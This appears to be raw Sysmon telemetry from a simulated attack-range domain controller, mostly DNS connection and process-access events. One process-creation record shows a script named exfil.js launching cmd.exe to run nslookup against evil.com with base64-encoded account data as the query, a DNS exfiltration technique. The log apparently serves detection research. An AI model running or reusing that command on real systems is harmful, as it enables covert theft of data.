AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62455-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50480- 354300x8000000000000000206961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-50480-false127.0.0.1-53domain 354300x8000000000000000206960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-50479-false127.0.0.1-53domain 354300x8000000000000000206959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50479- 354300x8000000000000000206958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.619{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-50479-false127.0.0.1-53domain 354300x8000000000000000206957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.618{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-50478-false127.0.0.1-53domain 354300x8000000000000000206956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50478- 354300x8000000000000000206955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.618{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-50478-false127.0.0.1-53domain 354300x8000000000000000206954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.509{00000000-0000-0000-0000-000000000000}3620<unknown process>-udpfalsefalse127.0.0.1-50477-false127.0.0.1-53domain 354300x8000000000000000206953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.509{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63168-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63168-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50477- 354300x8000000000000000206950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{00000000-0000-0000-0000-000000000000}3620<unknown process>-udptruefalse127.0.0.1-50477-false127.0.0.1-53domain 354300x8000000000000000206949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{00000000-0000-0000-0000-000000000000}3620<unknown process>-udpfalsefalse127.0.0.1-50476-false127.0.0.1-53domain 354300x8000000000000000206948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50476- 354300x8000000000000000206947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{00000000-0000-0000-0000-000000000000}3620<unknown process>-udptruefalse127.0.0.1-50476-false127.0.0.1-53domain 354300x8000000000000000206946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{00000000-0000-0000-0000-000000000000}3620<unknown process>-udpfalsefalse127.0.0.1-50475-false127.0.0.1-53domain 354300x8000000000000000206945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50475- 354300x8000000000000000206944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.507{00000000-0000-0000-0000-000000000000}3620<unknown process>-udptruefalse127.0.0.1-50475-false127.0.0.1-53domain 354300x8000000000000000206943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.451{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62259-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62259-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50474- 354300x8000000000000000206940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.445{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50473- 354300x8000000000000000206939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.444{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50472- 354300x8000000000000000206938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.379{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62590-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.378{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62590-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.378{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50471- 354300x8000000000000000206935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.378{00000000-0000-0000-0000-000000000000}7732<unknown process>-udptruefalse127.0.0.1-50471-false127.0.0.1-53domain 354300x8000000000000000206934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50470- 354300x8000000000000000206933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{00000000-0000-0000-0000-000000000000}7732<unknown process>-udptruefalse127.0.0.1-50470-false127.0.0.1-53domain 354300x8000000000000000206932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50469- 354300x8000000000000000206931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.377{00000000-0000-0000-0000-000000000000}7732<unknown process>-udptruefalse127.0.0.1-50469-false127.0.0.1-53domain 354300x8000000000000000206930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.262{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-50468-false127.0.0.1-53domain 354300x8000000000000000206929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.262{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60804-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60804-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50468- 354300x8000000000000000206926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-50468-false127.0.0.1-53domain 354300x8000000000000000206925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-50467-false127.0.0.1-53domain 354300x8000000000000000206924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50467- 354300x8000000000000000206923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.259{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-50467-false127.0.0.1-53domain 354300x8000000000000000206922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.258{00000000-0000-0000-0000-000000000000}4004<unknown process>-udpfalsefalse127.0.0.1-50466-false127.0.0.1-53domain 354300x8000000000000000206921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.258{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50466- 354300x8000000000000000206920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.258{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-50466-false127.0.0.1-53domain 354300x8000000000000000206919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.108{00000000-0000-0000-0000-000000000000}6604<unknown process>-udpfalsefalse127.0.0.1-50465-false127.0.0.1-53domain 354300x8000000000000000206918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.107{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63059-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.105{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63059-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.105{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50465- 354300x8000000000000000206915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{00000000-0000-0000-0000-000000000000}6604<unknown process>-udpfalsefalse127.0.0.1-50464-false127.0.0.1-53domain 354300x8000000000000000206914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50464- 354300x8000000000000000206913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50463- 354300x8000000000000000206912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.104{00000000-0000-0000-0000-000000000000}6604<unknown process>-udptruefalse127.0.0.1-50463-false127.0.0.1-53domain 354300x8000000000000000206911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.051{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-50462-false127.0.0.1-53domain 354300x8000000000000000206910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.051{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61014-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61014-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-50461-false127.0.0.1-53domain 354300x8000000000000000206907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-50461-false127.0.0.1-53domain 354300x8000000000000000206906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50451-false127.0.0.1-53domain 10341000x8000000000000000206905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.250{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D742-000000005F02}3552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.250{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D742-000000005F02}3552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.250{2E1864BB-18E6-629A-D742-000000005F02}35526000C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D642-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D742-000000005F02}3552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D642-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-18E0-629A-6742-000000005F02}39764288C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-D642-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.240{2E1864BB-18E6-629A-D642-000000005F02}1908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbrj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.234{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzk.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-18E6-629A-D442-000000005F02}42845992C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D542-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 